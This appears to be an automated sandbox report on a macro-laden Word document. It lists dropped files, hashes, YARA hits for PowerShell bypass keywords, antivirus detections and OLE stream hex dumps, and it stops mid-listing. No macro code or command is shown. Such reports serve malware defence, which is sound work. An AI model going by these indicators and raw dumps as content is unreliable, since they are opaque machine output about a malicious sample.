                                                                                                                                            SHA1:6FA7FEB96E006EBFD84E2EE0F76A0372EB782B7C
                                                                                                                                            SHA-256:423719EA0CE3C206B853B3EFC92F9A068C517C0BF929A9834D1924B44E7D8AA0
                                                                                                                                            SHA-512:843B8AAFA3085E7AAB03710432F07A3BD7BC4C1514BAAA9C72DCDC2A8D623DB9D0945DF01C4005AE7496A1B0E861279CE5538D35899855EB9C3E3CE425D955FA
                                                                                                                                            Malicious:false
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, Author: Florian Roth
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{28D4A0D4-699A-4F69-8702-D3F95AC65D58}.tmp, Author: Florian Roth
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BC62BE70-F984-485F-A938-51B492D77752}.tmp
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1024
                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF2453EC8FFE1D14DF.TMP
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):512
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3::
                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):3.9846371270993712
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:va0WaUj+Ar/AhnGVN+Q9SaW/X0jhAtnezRpzJxGHZ:35Gyz/WRpzJs
                                                                                                                                            MD5:301129EF743494B2099BBC422B355C89
                                                                                                                                            SHA1:1332AD20AF54D9ECB475D33F8030297A123B3F22
                                                                                                                                            SHA-256:F41633365C2073B1D2AE47889F34DA492FA21FF32A3E4E4A393C83732E672778
                                                                                                                                            SHA-512:4B300477A8F370146AD56AB27BD5F92B9D00BDD8B717FD4025FEE6C6EA7674ABA5678200B800B7AA66C879EA7199FFA5C9A823E8FE47C45DCC46DAF77AB02886
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: PowerShell_in_Word_Doc, Description: Detects a powershell and bypass keyword in a Word document, Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, Author: Florian Roth
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Temp\~DFA094A62AA4BA8959.TMP, Author: Florian Roth
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%................... ...............................................................................................!...2..."...#...$...&.......'...(...)...*...+...,...-......./...0...1...3...................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RfORrHIRNe.LNK
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 4 07:49:11 2021, mtime=Thu Nov 4 07:49:11 2021, atime=Thu Nov 4 07:49:15 2021, length=39936, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1014
                                                                                                                                            Entropy (8bit):4.530334739432499
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:8j2nFgXg/XAlCPCHaXjByB//iX+WqcQ3flIicvbInJJlEDtZ3YilMMEpxRljKyT8:8j2b/XTTck67eEnlEDv3q3Qd7Qy
                                                                                                                                            MD5:563776B34A33F432F754E14CD0C811BC
                                                                                                                                            SHA1:467467EF57A6D838836835D5725D38E72FE49DAF
                                                                                                                                            SHA-256:BF65957F29E0D67AFCDD2F6FCBCB57879057E0313C152BC00F422395C4717AC1
                                                                                                                                            SHA-512:E36BFF43CB5926BC47DAFFAA7B1E3239002C4291C8F95BEE161ABD890938968C53B8D0EC3E4AE1065C06A72CB3C4880EC3165D3F4A2FE2CBD9D94B5A11D48AD3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: L..................F.... ...;.q.X...;.q.X....Y..X................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1.....dS&F..Desktop.d......QK.XdS&F*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....dS(F .RFORRH~1.DOC..J......dS&FdS&F*.........................R.f.O.R.r.H.I.R.N.e...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\RfORrHIRNe.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.f.O.R.r.H.I.R.N.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9..g............[D_....3N...W...9..g...
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):71
                                                                                                                                            Entropy (8bit):4.5549224798255485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:bDuMJlvQ9sm2mX1esm2v:bCkurUrI
                                                                                                                                            MD5:8DC46D624D55247F3AFCDF57A59AD13A
                                                                                                                                            SHA1:8AF5CE5B75E603C633DF82EBED33186753FB52BC
                                                                                                                                            SHA-256:903B82AD8418567C1F8EB0127EA8A86876D3C8CC86C10D1606B4D6CC7F82F2B8
                                                                                                                                            SHA-512:32D98F2F022128F67B3DF32680F1E45F3DAE22E7CEF27EEC184E4492A9C19A2C78DF7065D30C7C16A7C1D28558DB23B36D691283521609D16075A3A3B0E0205C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: [folders]..Templates.LNK=0..RfORrHIRNe.LNK=0..[doc]..RfORrHIRNe.LNK=0..
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):162
                                                                                                                                            Entropy (8bit):2.5038355507075254
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8016
                                                                                                                                            Entropy (8bit):3.5802717128210926
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:chQCQMqeqvsqvJCwo5z8hQCQMqeqvsEHyqvJCworXzKAY7H6F2XblUVjA2:cWzo5z8WnHnorXzK6F2XcA2
                                                                                                                                            MD5:672D4FA68A59184E8FA26CBCC685409F
                                                                                                                                            SHA1:B2B0FCDE6711AEFA0F586B6EF5B87555FFDD4CC5
                                                                                                                                            SHA-256:E9474717A3CF6EC83C908F73EBAC809370AC4D9B8740583D72382B2691D01F1E
                                                                                                                                            SHA-512:44E0586F7CAE5564EA7B102B4EB713555242CC027FC1CED03EEB2004D2403584BF8108FF7853B14FA6FCC95F1892C6E75DA0D0DC3099A8A0CE6A22B787BC1E3C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A5FROKCO9YHIX8A61MON.temp
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8016
                                                                                                                                            Entropy (8bit):3.5802717128210926
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:chQCQMqeqvsqvJCwo5z8hQCQMqeqvsEHyqvJCworXzKAY7H6F2XblUVjA2:cWzo5z8WnHnorXzK6F2XcA2
                                                                                                                                            MD5:672D4FA68A59184E8FA26CBCC685409F
                                                                                                                                            SHA1:B2B0FCDE6711AEFA0F586B6EF5B87555FFDD4CC5
                                                                                                                                            SHA-256:E9474717A3CF6EC83C908F73EBAC809370AC4D9B8740583D72382B2691D01F1E
                                                                                                                                            SHA-512:44E0586F7CAE5564EA7B102B4EB713555242CC027FC1CED03EEB2004D2403584BF8108FF7853B14FA6FCC95F1892C6E75DA0D0DC3099A8A0CE6A22B787BC1E3C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                                            C:\Users\user\Desktop\~$ORrHIRNe.doc
                                                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):162
                                                                                                                                            Entropy (8bit):2.5038355507075254
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                                                            MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                                                            SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                                                            SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                                                            SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Wed Nov 3 22:06:00 2021, Last Saved Time/Date: Wed Nov 3 22:17:00 2021, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0
                                                                                                                                            Entropy (8bit):3.971846508462655
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Word document (32009/1) 54.23%
                                                                                                                                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                                            File name:RfORrHIRNe.doc
                                                                                                                                            File size:38912
                                                                                                                                            MD5:955d5d2855b291a3cf1fc6655bbbbb79
                                                                                                                                            SHA1:b58901cf8967310228bc6e4c224b2cfaf014bc65
                                                                                                                                            SHA256:63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
                                                                                                                                            SHA512:044f7164d30798656cb0f17f1a7ab76cdceb2f6bfb1107f04a6f300d2551459d0804a03db76591a7a10a900fddc8a7da5d9442ec4846709f9c9684e1aaeaf14e
                                                                                                                                            SSDEEP:384:o/MMMOtM1ulwUmDoKdAa8WRGbiSAoKXMVkK54miJ2JLN0jUDt3ou0FeK:o/MMMOtM1ulwU0T1MVkzmM2fxyu0FeK
                                                                                                                                            File Content Preview:........................>......................./...........2..................................................................................................................................................................................................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                            Static OLE Info

                                                                                                                                            General

                                                                                                                                            Document Type:OLE
                                                                                                                                            Number of OLE Files:1

                                                                                                                                            OLE File "RfORrHIRNe.doc"

                                                                                                                                            Indicators

                                                                                                                                            Has Summary Info:True
                                                                                                                                            Application Name:Microsoft Office Word
                                                                                                                                            Encrypted Document:False
                                                                                                                                            Contains Word Document Stream:True
                                                                                                                                            Contains Workbook/Book Stream:False
                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                            Flash Objects Count:
                                                                                                                                            Contains VBA Macros:True

                                                                                                                                            Summary

                                                                                                                                            Code Page:1251
                                                                                                                                            Title:
                                                                                                                                            Subject:
                                                                                                                                            Author:Admin
                                                                                                                                            Keywords:
                                                                                                                                            Comments:
                                                                                                                                            Template:Normal.dotm
                                                                                                                                            Last Saved By:Admin
                                                                                                                                            Revion Number:12
                                                                                                                                            Total Edit Time:420
                                                                                                                                            Create Time:2021-11-03 22:06:00
                                                                                                                                            Last Saved Time:2021-11-03 22:17:00
                                                                                                                                            Number of Pages:1
                                                                                                                                            Number of Words:10
                                                                                                                                            Number of Characters:61
                                                                                                                                            Creating Application:Microsoft Office Word
                                                                                                                                            Security:0

                                                                                                                                            Document Summary

                                                                                                                                            Document Code Page:1251
                                                                                                                                            Number of Lines:1
                                                                                                                                            Number of Paragraphs:1
                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                            Company:
                                                                                                                                            Contains Dirty Links:False
                                                                                                                                            Shared Document:False
                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                            Application Version:1048576
                                                                                                                                            Language:

                                                                                                                                            Streams with VBA

                                                                                                                                            VBA File Name: NewMacros.bas, Stream Size: 1428
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/NewMacros
                                                                                                                                            VBA File Name:NewMacros.bas
                                                                                                                                            Stream Size:1428
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . [ . . . . . . . . . . . . . . . . z . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 16 03 00 04 f0 00 00 00 1a 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 5b 03 00 00 a3 04 00 00 00 00 00 00 01 00 00 00 ef 7a b0 43 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            VBA Code
                                                                                                                                            VBA File Name: ThisDocument.cls, Stream Size: 1159
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/VBA/ThisDocument
                                                                                                                                            VBA File Name:ThisDocument.cls
                                                                                                                                            Stream Size:1159
                                                                                                                                            Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . m . . ! . N . . . . . . . . D . > . . . I C . . . . . . < . . . . . . . . . . . . . . . . . . . . . 4 Y < O B . < J . . . > . \\ U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . 4 Y < O B . < J . . . > . \\ U . . . m . . ! . N . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 16 03 00 06 00 01 00 00 54 03 00 00 e4 00 00 00 ea 01 00 00 82 03 00 00 90 03 00 00 e4 03 00 00 00 00 00 00 01 00 00 00 ef 7a b9 7a 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d4 99 6d f6 e0 21 c5 4e 9a 91 e1 9f 98 e5 c3 ad 44 9c 3e c5 84 dc 49 43 a3 a3 b7 96 9e 92 3c cf 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            VBA Code

                                                                                                                                            Streams

                                                                                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                            General
                                                                                                                                            Stream Path:\x1CompObj
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:114
                                                                                                                                            Entropy:4.42107393569
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:0.262838901893
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 0f 00 00 00 78 00 00 00 1b 00 00 00 84 00 00 00 05 00 00 00 90 00 00 00 06 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 17 00 00 00 a8 00 00 00 0b 00 00 00 b0 00 00 00 10 00 00 00 b8 00 00 00
                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:0.460733334731
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A d m i n . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                                                                                                                            Stream Path: 1Table, File Type: data, Stream Size: 7076
                                                                                                                                            General
                                                                                                                                            Stream Path:1Table
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:7076
                                                                                                                                            Entropy:5.95668538259
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                                                                                            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                                            Stream Path: Data, File Type: SysEx File - Garfield, Stream Size: 4096
                                                                                                                                            General
                                                                                                                                            Stream Path:Data
                                                                                                                                            File Type:SysEx File - Garfield
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:7.54547746336
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . q 4 : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . C . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . b . . . \\ . . . . . . l . ^ . * c P . G . . . . . . . . 8 . . . . . . . D . . . . . . . . n . . 0 . . . . l . ^ . * c P . G . . . . . . . . P N G . . . . . . . . I H D R . . . . . . . & . . . . . . . . z . . . . I D A T x . . . . .
                                                                                                                                            Data Raw:f0 0e 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 71 34 3a 02 b8 02 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 40 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 1c 00 00 00 04 41 01 00 00 00 05 c1 04 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 31 00 00 00
                                                                                                                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 410
                                                                                                                                            General
                                                                                                                                            Stream Path:Macros/PROJECT
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Stream Size:410
                                                                                                                                            Entropy:5.39100661112
                                                                                                                                            Base64 Encoded:True
